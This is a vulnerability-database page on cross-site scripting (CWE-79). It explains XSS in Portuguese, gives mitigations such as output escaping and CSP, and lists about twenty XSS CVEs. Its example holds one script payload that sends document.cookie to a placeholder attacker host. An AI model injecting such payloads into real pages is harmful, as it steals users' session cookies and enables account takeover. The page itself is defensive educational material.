Fallos del tipo CWE-79

29.056 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-38147MEDIUMSilverstripe silverstripe/framework through 4.11 allows XSS (issue 3 of 3).EPSS 0.6%CVE-2024-34460MEDIUMThe Tree Explorer tool from Organizer in Zenario before 9.5.60602 is affected by XSS. (This component was removed in 9.5.60602.)EPSS 0.6%CVE-2024-30927MEDIUMCross Site Scripting vulnerability in DerbyNet v9.0 and below allows attackers to execute arbitrary code via the racer-results.php componentEPSS 0.6%CVE-2024-25831MEDIUMF-logic DataCube3 Version 1.0 is affected by a reflected cross-site scripting (XSS) vulnerability due to improper input sanitization. An autEPSS 0.6%CVE-2024-1256LOWJspxcms filter_text.do cross site scriptingEPSS 0.6%CVE-2026-44588CRITICALSiYuan: URL-encoded title bypasses `escapeAriaLabel`, decoded by `decodeURIComponent` into a tooltip-XSSEPSS 0.6%CVE-2023-1254LOWSourceCodester Health Center Patient Record Management System birthing_print.php cross site scriptingEPSS 0.6%CVE-2023-2155LOWSourceCodester Air Cargo Management System cross site scriptingEPSS 0.6%CVE-2024-4265MEDIUMMaster Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.5.9 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-4840MEDIUMMapPress Maps for WordPress <= 2.88.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.6%CVE-2023-1363LOWSourceCodester Computer Parts Sales and Inventory System Add User Account cross site scriptingEPSS 0.6%CVE-2024-33724MEDIUMSOPlanning 1.52.00 is vulnerable to Cross Site Scripting (XSS) via the groupe_id parameter to process/groupe_save.php.EPSS 0.6%CVE-2022-37430MEDIUMSilverstripe silverstripe/framework through 4.11 allows XSS vulnerability via href attribute of a link (issue 2 of 2).EPSS 0.6%CVE-2020-22327MEDIUMAn issue was discovered in HFish 0.5.1. When a payload is inserted where the name is entered, XSS code is triggered when the administrator vEPSS 0.6%CVE-2026-44670CRITICALSiYuan: Stored XSS via Attribute View name to Electron renderer RCE in SiYuanEPSS 0.6%CVE-2023-33971MEDIUMFormcreator vulnerable to stored XSS from ##FULLFORM##EPSS 0.6%CVE-2024-26071MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.6%CVE-2026-40873HIGHmailcow: dockerized vulnerable to stored XSS in Quarantine attachment filenamesEPSS 0.6%CVE-2023-0246LOWearclink ESPCMS Content cross site scriptingEPSS 0.6%CVE-2023-42656MEDIUMMOVEit Transfer Reflected XSSEPSS 0.6%